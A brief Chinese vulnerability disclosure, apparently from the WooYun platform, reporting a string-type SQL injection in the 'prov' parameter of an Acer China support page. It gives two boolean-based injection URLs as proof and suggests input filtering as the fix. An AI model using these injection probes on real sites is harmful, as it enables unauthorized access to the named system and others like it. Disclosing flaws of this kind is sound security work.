简要描述:
http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei
注入
字符型的
详细说明:
没什么好说了很明显了!
漏洞证明:
http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei' and 1=1 and 'x'='x
http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei' and 1=2 and 'x'='x
修复方案:过滤吧!
作者 公子@乌云